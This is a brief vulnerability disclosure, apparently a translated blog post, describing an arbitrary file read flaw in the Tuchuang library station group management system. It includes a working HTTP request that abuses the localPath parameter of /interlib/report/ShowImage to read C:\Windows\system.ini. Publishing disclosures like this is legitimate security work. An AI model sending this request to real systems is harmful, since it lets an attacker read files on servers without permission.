Tuchuang Software Library Station Group Management System Arbitrary File Reading Vulnerability
Tuchuang Software Library Station Group Management System Arbitrary File Reading Vulnerability
Tuchuang Software Library Station Group Management System Arbitrary File Reading Vulnerability
Vulnerability Description
Tuchuang Software Library Station Group Management System has a vulnerability to read any file, and an attacker can read any file through the vulnerability
Vulnerability Impact
TuChuang Software Library Station Group Management System
Network surveying and mapping
Vulnerability reappears
The login page is as follows
The vulnerability request package is
GET /interlib/report/ShowImage?localPath=C:\Windows\system.ini HTTP/1.1
Host:
Content-Length: 4
Successfully read the system.ini file
This post is licensed under CC BY 4.0 by the author.